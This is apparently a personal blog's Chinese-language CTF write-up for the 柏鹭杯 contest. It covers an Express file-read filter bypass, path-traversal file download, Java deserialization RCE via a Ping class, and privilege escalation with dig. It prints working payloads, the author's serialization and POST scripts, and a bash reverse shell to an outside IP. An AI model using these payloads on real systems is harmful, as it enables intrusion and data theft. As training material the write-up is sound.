CHHHCHHOH 's BLOG

柏鹭杯

Express fs

进入题目后点击按钮跳转到?file=check.html,一片空白,还以为要用file://进行读取,后面才发现可以直接读如:?file=/etc/passwd,读取环境变量什么都没有。本来还想说有没有非预期,主办方删的很干净,什么都没有。在/proc/self/cmdlind看到node main.js,读取main.js,发现

const express = require("express");
const fs = require("fs");

const app = express();

const PORT = process.env.PORT || 80;

app.use('/static', express.static('static'))

app.use((req, res, next) => {
if (
[req.body, req.headers, req.query].some(
(item) => item && JSON.stringify(item).includes("flag")
)
) {
return res.send("臭黑客!");
}
next();
});

app.get("/", (req, res) => {
try {
res.setHeader("Content-Type", "text/html");
res.send(fs.readFileSync(req.query.file || "index.html").toString());
} catch (err) {
console.log(err);
res.status(500).send("Internal server error");
}
});

app.listen(PORT, () => console.log(express server listening on port ${PORT}));

其中JSON.stringify() 方法将 JavaScript 对象转换为字符串。我们传进去的query_string都会被转化,所以?a=flag&file=1也会被过滤。题目其实和corCTF 2022 simplewaf一模一样,主要是传参?file[href]=a&file[origin]=a&file[protocol]=file:&file[hostname]=来让readFileSync()可以对文件路径进行url解码 ,然后因为get本身会有一次url解码,所以我们只要对flag进行二次url编码就可以绕过检测。最终payload(其实和corctf的一模一样):?file[href]=a&file[origin]=a&file[protocol]=file:&file[hostname]=&file[pathname]=fl%2561g.txt

综合题5

先上传了一张图片,成功上传,跳转到/upload,返回的json形式的字符串,而且文件也没被改名字,但是没有返回路径。后面又传了几次,发现上传之后没有跳转到/upload,而且前端页面上多了个view按钮,点击抓包跳转到/readfile?filename=,返回的数据包就是我们上传的图片。然后放包就下载了我们刚才上传的文件。存在任意文件读取及下载漏洞,然后我们是在/app还是/app/Upload路径下,反正多来几个../就可以跳转到根目录了,然后读取/etc/passwd,成功读取。理所当然的先读/proc,(╯▽╰),然后环境变量又被删干净了。然后读取/proc/self/cmdline找到/app/demo.jar,下载并解压,找到一段代码如下:

    private String enc_flag1 = "UFVTUhgqY3d0FQxRVFcHBlQLVwdSVlZRVlJWBwxeVgAHWgsBWgUAAQEJRA==";
    public String O0O = "6925cc02789c1d2552b71acc4a2d48fd";
    public String o0o(String Ooo) {
        StringBuilder oOo = new StringBuilder();
        int o0O = 0;

        for(int OO0 = Ooo.length(); o0O < OO0; ++o0O) {
            char Oo0 = Ooo.charAt(o0O);
            char oOO = this.O0O.charAt(o0O % this.O0O.length());
            char OOo = (char)(Oo0 ^ oOO);
            oOo.append(OOo);
        }

        return Base64.getEncoder().encodeToString(oOo.toString().getBytes());
    }

其实最开始没想到这居然就是flag,只是看到类似于base加密的字符串就想要解密,ctfer可悲的习性。后面发现base64解不出来,于是扔给chatgpt,给出了解密脚本

import java.util.Base64;
public class Main {
    public static void main(String[] args) {
        String enc_flag1 = "UFVTUhgqY3d0FQxRVFcHBlQLVwdSVlZRVlJWBwxeVgAHWgsBWgUAAQEJRA==";
        String O0O = "6925cc02789c1d2552b71acc4a2d48fd";
        
        String decryptedString = decrypt(enc_flag1, O0O);
        
        System.out.println(decryptedString);
    }
    
    public static String decrypt(String enc_flag1, String O0O) {
        byte[] decodedBytes = Base64.getDecoder().decode(enc_flag1);
        
        StringBuilder decrypted = new StringBuilder();
        for (int i = 0; i < decodedBytes.length; i++) {
            char Oo0 = (char) (decodedBytes[i] ^ O0O.charAt(i % O0O.length()));
            decrypted.append(Oo0);
        }
        
        return decrypted.toString();
    }
}

运行便是flag。

综合题6

综合题6和综合题5是同一个环境,有一个ping类

class Ping implements Serializable {
    private static final long serialVersionUID = 1L;
    private String command;
    private String arg1;
    private String arg2;

    Ping() {
    }

    public void setCommand(String command) {
        this.command = command;
    }

    public void setArg1(String arg1) {
        this.arg1 = arg1;
    }

    public void setArg2(String arg2) {
        this.arg2 = arg2;
    }

    private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        String[] cmdArray = new String[]{this.command, this.arg1, this.arg2};
        Runtime.getRuntime().exec(cmdArray);
    }
}

这不就是主办方甩我们脸上的恶意类吗?而且Upload下还有

@PostMapping({"/internalApi/v3.2/updateConfig"})
    public String syncData(@RequestBody String payload) {
        try {
            byte[] data = Base64.getDecoder().decode(payload);
            ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
            Object obj = ois.readObject();
            return "Data synced successfully";
        } catch (ClassNotFoundException | IOException var5) {
            return "Failed to sync data: " + var5.getMessage();
        }
    }

就是反序列化一个经过base64加密的字符串,真的是很简单了,如果是php的话。本(笨)人也没去认真的学Java反序列化这块,只记得好像可以有两种写法,写文件序列化,不写文件序列化。反正就是连写反序列的基本语法都不清楚,☹。后面比赛的时候还去搜java反序列的基本,去参考别人写的语句又去问chatgpt,弄了好久终于弄出来一个序列化的脚本,

    Ping payload = new Ping();
    payload.setCommand("ls");
    payload.setArg1("-al");
    payload.setArg2("/");
    ByteArrayOutputStream out = new ByteArrayOutputStream();
    ObjectOutputStream objOut = new ObjectOutputStream(out);
    objOut.writeObject(payload);
    System.out.println(out.toByteArray());
    String ans = Base64.getEncoder().encodeToString(out.toByteArray());
    System.out.println(ans);

后面还加上

    byte[] data = Base64.getDecoder().decode(ans);
    ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
    Object obj = ois.readObject();

在本地进行调试。报错了,也就是的确反序列化了,并执行了我的命令,因为是Windows系统,所以当然会报错。然后就去/internalApi/v3.2/updateConfig路由下post传值,最开始传payload=,报错了,后面仔细看源码才发现不用加payload=,源码里的payload就是我们post的字符串,传过去后还是报错,但是反序列时的报错说ping类的位置在org.example.ping,至少是进行了反序列,说明至少传值的方式对了。然后题目里的ping类其实应该是在com.example.demo.ping,所以是类的路径不对,所以我在本地把org.example改成com.example.demo,然后传值。结果直接没反序列就报错了。完全不知道为什么,脚本也没改啊。改回org.example.ping又报的是反序列时的错了。然后还特意用spring-boot的项目(之前软创时写的BlogDemo)来运行我的Main.java。后面才知道要用Java进行发包才可以,于是又让chatgpt写了个Java的发包脚本。

try {
        // 创建一个URL对象,指定POST请求的目标网址
        URL url = new URL("http://8.130.127.14:51180/internalApi/v3.2/updateConfig");

        // 打开一个HTTP连接
        HttpURLConnection connection = (HttpURLConnection) url.openConnection();

        // 设置请求方法为POST
        connection.setRequestMethod("POST");

        // 启用输入和输出流
        connection.setDoInput(true);
        connection.setDoOutput(true);

        // 设置请求头信息(可选)
        connection.setRequestProperty("Content-Type", "application/json");

        // 构建POST请求体数据
        String postData = ans;
        byte[] postDataBytes = postData.getBytes("UTF-8");

        // 获取连接的输出流
        DataOutputStream out_out = new DataOutputStream(connection.getOutputStream());

        // 将POST请求体数据写入连接
        out_out.write(postDataBytes);
        out_out.flush();
        out_out.close();

        // 获取服务器响应的输入流
        BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
        String inputLine;
        StringBuilder response = new StringBuilder();

        // 读取响应内容
        while ((inputLine = in.readLine()) != null) {
            response.append(inputLine);
        }
        in.close();

        // 打印响应内容
        System.out.println(response.toString());

        // 关闭连接
        connection.disconnect();
    } catch (IOException e) {
        e.printStackTrace();
    }

这回终于是反序列化成功了,但是无回显的rce,于是弹shell,结果一直不成功,发现要这样bash -c才会真正执行我们的命令,之前没回显也没看出来。

    payload.setCommand("bash");
    payload.setArg1("-c");
    payload.setArg2("bash -i >& /dev/tcp/124.221.19.214/2333 0>&1");

终于成功弹到shell,不知道用不用spring-boot有没有影响,还是说只要改成com.example.demo就可以了。比赛时也没时间来做实验,所以也不是很清楚。
弹到shell后,当然还是老样子,env,好吧,还是没有。在/app下有个hint.txt说flag在/root/flag2,所以还要提权才可以。经典find / -perm -u=s -type f 2>/dev/null,看了一下好像(??)也没什么命令可以提,后面又尝试dbus之类的,结果也没有提出来。还用了history命令来查看执行过的命令,找到/tmp/mytar,下载解压也没什么。/tmp下都看了一遍也没找到什么。其实是dig命令提权。之前用find命令的结果也没仔细的去一个一个尝试,所以真是绕个很大的弯路,最后相当于可以root的权限去读文件。

其他没解出来的

php反序列化

<?php
highlight_file(__FILE__);
$flag=file_get_contents('/tmp/flag.txt');
class test{
    public function __call($f,$p){
        global $flag;
        var_dump($flag);
    }
}
if(isset($_GET['code']))var_dump(unserialize(base64_decode($_GET['code'])));
?>

源码就这么短短几句,就是要调用__call函数就可以了。但是,什么都没有怎么触发???比赛的时候也是0解,后面一道,叫UTA好像,更抽象。

<?php
if(isset($_GET['code']))var_dump(unserialize(base64_decode($_GET['code'])));
?>

就这么一句就更不知道怎么做了,php的原生类?反正我不会,当然还是0解。
还有个0解的jdbc,没怎么看,一看Java果断跳过。
然后还有个综合题7,那时候比赛结束了,也不知道它还要考什么,反正综合题的环境都是同一个。

添加新评论